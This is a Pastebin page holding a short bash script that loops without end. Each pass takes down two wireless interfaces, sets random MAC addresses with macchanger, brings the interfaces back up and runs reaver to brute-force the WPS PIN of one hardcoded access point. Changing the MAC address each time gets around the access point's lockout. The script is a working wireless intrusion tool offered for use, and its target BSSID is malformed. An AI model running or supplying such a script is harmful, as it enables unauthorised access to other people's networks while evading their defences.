Advertisement
Guest User

Variable reaver

a guest
Sep 6th, 2015
483
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.51 KB | None | 0 0
  1. #!/bin/bash
  2. #Changing Mac Address to random Mac Address
  3. while :; do echo
  4. echo "Changing Mac Address to random Mac Address..";
  5. ifconfig mon0 down;
  6. ifconfig mon0 down;
  7. ifconfig wlan2 down;
  8. ifconfig wlan2 down;
  9. macchanger -r mon0;
  10. macchanger -r wlan2;
  11. ifconfig mon0 up;
  12. ifconfig mon0 up;
  13. ifconfig wlan2 up;
  14. ifconfig wlan2 up;
  15. echo "Mac Address Changed and interface is up!"
  16. #running reaver 1.4
  17. echo "running reaver 1.4"
  18. echo y|reaver -i mon0 -b C87:19:89:E7:13 -c1 -vv -t 20 -n -d10 -g1 -L;
  19. sleep 1
  20. done
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement